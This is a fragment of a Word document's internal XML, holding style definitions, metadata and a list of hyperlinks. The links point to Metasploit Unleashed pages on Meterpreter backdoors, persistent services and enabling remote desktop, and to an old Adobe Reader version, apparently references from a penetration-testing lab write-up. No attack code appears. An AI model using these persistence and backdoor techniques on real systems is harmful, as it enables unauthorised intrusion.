    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008A6536"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008A6536"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008A6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ffensive-security.com/metasploit-unleashed/enabling-remote-desktop/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.oldapps.com/betasearch.php?cx=007779823686351122034%3Ai7o_lb6edjm&amp;cof=FORID%3A9&amp;ie=UTF-8&amp;q=adobe+reader+8.1.2&amp;siteurl=http%3A%2F%2Fwww.oldapps.com%2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offensive-security.com/metasploit-unleashed/meterpreter-servic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offensive-security.com/metasploit-unleashed/interacting-metsvc/" TargetMode="External"/><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offensive-security.com/metasploit-unleashed/meterpreter-backdoor/" TargetMode="External"/><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drive.google.com/file/d/1dkJkXGSGwe0KLwZFFdYh9aicprM1jNCT/view?usp=shar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ffensive-security.com/metasploit-unleashed/meterpreter-service/" TargetMode="External"/><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2549</Words>
  <Characters>14535</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>121</Lines>
  <Paragraphs>34</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-31T05:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-31T05:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>